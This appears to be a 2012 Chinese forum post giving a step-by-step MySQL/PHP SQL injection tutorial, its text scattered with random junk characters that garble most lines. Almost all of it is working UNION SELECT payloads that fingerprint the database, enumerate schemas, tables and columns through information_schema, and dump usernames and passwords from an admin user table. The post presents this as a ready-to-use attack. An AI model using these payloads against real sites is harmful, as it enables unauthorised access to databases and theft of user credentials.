+ {. D/ }8 e, i6 d
教程内容:Mysql 5+php 注入
0 R* I/ A/ d: Z: `# Z1 v4 F, m
1 ?# l/ {8 f" |, q
" _0 v" F* v7 E1 T8 o; R! d
# `5 J1 T. O5 X x一.查看MYSQL基本信息(库名,版本,用户)& P2 i' F3 S* u: I/ h& V
) N" `; I, t/ c- V" Z, U" V* Q
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
; ^4 ~, G$ ? W' f2 z/ F2 u
6 {" X% |# r! i- ^2 d6 C二.查数据库8 y) e% O0 K, p1 q- Q
2 P# Z7 r6 A4 W5 S7 Tand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
) q' F7 P. O! Llimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
9 O' V( q' l" d) g/ y
% ]- ^6 N6 t% i' o$ t: `) w7 m三.暴表
( b1 v* w- S4 D
1 a' O2 |: u) `and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
( R a' B: L6 ?/ A* W) h0 `
/ L6 ]$ n. n5 rlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
) z4 ^7 ?1 l7 Z9 W+ l ^
# H6 Z6 m8 ^ L J8 p四.暴字段( l8 H9 S* E% y; ]& j0 V9 m
/ j+ |5 r- C! |% _and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*2 f8 @7 r1 l. k6 k: o' ^! t3 G
' U1 a7 y/ ^5 P$ nlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。- G6 B$ l& d; g
2 b5 P* ?# G! N( ^* W
五.暴数据
% R3 B1 D% B% P! z+ \
+ j* T' B0 H" t5 c0 c( u9 K, Jand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
3 o8 a# M5 `, h/ l. ^5 c3 b" C9 `" t. n2 @. \
" ~6 G' _ a: v' K2 i q7 U
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。( |6 {4 J! w6 k2 p& G
|
发表于 2012-9-13 16:27:53
收藏
支持
反对